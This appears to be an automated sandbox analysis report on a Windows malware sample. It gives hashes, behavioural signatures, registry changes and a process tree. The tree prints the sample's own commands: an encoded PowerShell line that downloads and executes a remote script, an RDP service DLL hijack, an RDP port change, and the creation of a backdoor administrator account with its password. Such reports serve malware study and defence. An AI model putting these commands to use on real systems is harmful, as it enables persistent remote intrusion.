Analysis
- Max time kernel: 273s
- Max time network: 292s
- Platform: windows10_x64
- Resource: win10v20210408
- Submitted: 08-06-2021 15:58
- Static task: static1
- Behavioral task: behavioral1
  Sample: 2fd6796fd158c93b14654240533511af6fec03e5.exe
  Resource: win7v20210410
- Behavioral task: behavioral2
  Sample: 2fd6796fd158c93b14654240533511af6fec03e5.exe
  Resource: win10v20210408
General
- Target: 2fd6796fd158c93b14654240533511af6fec03e5.exe
- Size: 6.0MB
- MD5: 20f307c716a689f4afa3a76b7143db22
- SHA1: 2fd6796fd158c93b14654240533511af6fec03e5
- SHA256: 3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
- SHA512: 0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes (flow, pid, process):
  - 18, 2248, powershell.exe
  - 20, 2248, powershell.exe
  - 21, 2248, powershell.exe
  - 22, 2248, powershell.exe
  - 24, 2248, powershell.exe
  - 26, 2248, powershell.exe
  - 28, 2248, powershell.exe
  - 30, 2248, powershell.exe
  - 32, 2248, powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule matches (resource, yara_rule):
  - \Windows\Branding\mediasrv.png, upx
  - \Windows\Branding\mediasvc.png, upx
- Loads dropped DLL (2 IoCs)
  Processes (pid, process):
  - 2368
  - 2368
- Drops file in Program Files directory (4 IoCs)
  Processes (description, ioc, process):
  - File opened for modification, C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT, powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes (description, ioc, process):
  - File opened for modification, C:\Windows\branding\mediasvc.png, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3D9.tmp, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI489.tmp, powershell.exe
  - File opened for modification, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat, powershell.exe
  - File created, C:\Windows\branding\mediasvc.png, powershell.exe
  - File opened for modification, C:\Windows\branding\Basebrd, powershell.exe
  - File opened for modification, C:\Windows\branding\mediasrv.png, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1iimm3bo.pbt.ps1, powershell.exe
  - File opened for modification, C:\Windows\branding\wupsvc.jpg, powershell.exe
  - File created, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI447.tmp, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI477.tmp, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI488.tmp, powershell.exe
  - File created, C:\Windows\branding\mediasrv.png, powershell.exe
  - File created, C:\Windows\branding\wupsvc.jpg, powershell.exe
  - File opened for modification, C:\Windows\branding\ShellBrd, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kioftf2k.g14.psm1, powershell.exe
- Modifies data under HKEY_USERS (64 IoCs)
  Processes (description, ioc, process); all entries by powershell.exe:
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache
  - Key created, \REGISTRY\USER\S-1-5-20\Software
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
  - Set value (data), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"
  - Set value (data), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"
  - Set value (int), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
  - Key created, \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA
  - Set value (data), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000
  - Set value (str), \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (2 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description, flow, ioc):
  - HTTP User-Agent header, 20, Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, 22, Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (pid, process):
  - 2860, powershell.exe (3 entries)
  - 1628, powershell.exe (3 entries)
  - 1968, powershell.exe (3 entries)
  - 1448, powershell.exe (3 entries)
  - 2860, powershell.exe (3 entries)
  - 2248, powershell.exe (3 entries)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid, process):
  - 624
  - 624
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description, pid, process), grouped by pid in the order recorded:
  - 2860, powershell.exe: Token: SeDebugPrivilege
  - 1628, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - 1968, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - 1448, powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid/process wrote to memory of target pid/process); each event is recorded twice in the source table:
  - 736 2fd6796fd158c93b14654240533511af6fec03e5.exe wrote to memory of 2860 powershell.exe
  - 2860 powershell.exe wrote to memory of 3812 csc.exe
  - 3812 csc.exe wrote to memory of 1316 cvtres.exe
  - 2860 powershell.exe wrote to memory of 1628 powershell.exe
  - 2860 powershell.exe wrote to memory of 1968 powershell.exe
  - 2860 powershell.exe wrote to memory of 1448 powershell.exe
  - 2860 powershell.exe wrote to memory of 2572 reg.exe
  - 2860 powershell.exe wrote to memory of 728 reg.exe
  - 2860 powershell.exe wrote to memory of 2832 reg.exe
  - 2860 powershell.exe wrote to memory of 504 net.exe
  - 504 net.exe wrote to memory of 3628 net1.exe
  - 2860 powershell.exe wrote to memory of 2128 cmd.exe
  - 2128 cmd.exe wrote to memory of 3176 cmd.exe
  - 3176 cmd.exe wrote to memory of 2304 net.exe
  - 2304 net.exe wrote to memory of 780 net1.exe
  - 2860 powershell.exe wrote to memory of 1060 cmd.exe
  - 1060 cmd.exe wrote to memory of 2588 cmd.exe
  - 2588 cmd.exe wrote to memory of 3172 net.exe
  - 3172 net.exe wrote to memory of 776 net1.exe
  - 3636 cmd.exe wrote to memory of 1204 net.exe
  - 1204 net.exe wrote to memory of 2832 net1.exe
  - 4072 cmd.exe wrote to memory of 2592 net.exe
  - 2592 net.exe wrote to memory of 2308 net1.exe
  - 2264 cmd.exe wrote to memory of 1968 net.exe
  - 1968 net.exe wrote to memory of 3960 net1.exe
  - 2732 cmd.exe wrote to memory of 416 net.exe
  - 416 net.exe wrote to memory of 3920 net1.exe
  - 3200 cmd.exe wrote to memory of 2248 net.exe
  - 2248 net.exe wrote to memory of 1688 net1.exe
  - 1568 cmd.exe wrote to memory of 1012 net.exe
  - 1012 net.exe wrote to memory of 3452 net1.exe
  - 728 cmd.exe wrote to memory of 200 WMIC.exe
Processes
Process tree (nesting shows parent/child depth; each entry gives the image, its command line and the signatures it triggered):
- C:\Users\Admin\AppData\Local\Temp\2fd6796fd158c93b14654240533511af6fec03e5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2fd6796fd158c93b14654240533511af6fec03e5.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC53.tmp" "c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\CSC29E85CA2AA6F4C6ABF3767A694F2658A.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          Command line: net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          Command line: net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc Ghar4f5 /del
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc uJsRDLdG /add
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc uJsRDLdG /add
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc uJsRDLdG /add
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc uJsRDLdG
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc uJsRDLdG
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc uJsRDLdG
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C net user wgautilacc 1234
  - C:\Windows\system32\net.exe
    Command line: net user wgautilacc 1234
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc 1234
Downloads
- C:\Users\Admin\AppData\Local\Temp\RESAC53.tmp
  MD5: c7b68b111e87d34fa2d465c659719179
  SHA1: 8bb9d5b5690b55ca13e15b86e4b7229e6833941f
  SHA256: 3a8e95480468bd40ff6f88ea6317c3ad01bf986fe5d2b393a29e9a6fedd09730
  SHA512: 87d90026930f881af79292f200b897db696ab0d7d3dac6d72682c013f6da76502782f8608a05f86c5d2d297e9feebc45f6ea8b0e244705ad2a45a88fffac6e3c
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
  MD5: 920b50692e0e9c4e32c79f89fafce0c4
  SHA1: 4cb71db2bb05daa4e84c649b6c58cbfd20c8e484
  SHA256: 85fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
  SHA512: 966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
- C:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.dll
  MD5: 98bee00a697c41993ad40b7d9cf4736e
  SHA1: 3392807b8aaece64992db5c17273fc2140f3779d
  SHA256: eeb288ca161e698c050e72c65771f107ceb07440d82eb83d47490349de059279
  SHA512: 3583a776cd0be2fbfe34ae2d76466ee2458f1f82ebe5a501009c78e08a3b754e9b469f92e2c9c8e905f146918429136cc4555a8faa0532d142f43118db412943
- \??\PIPE\lsarpc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
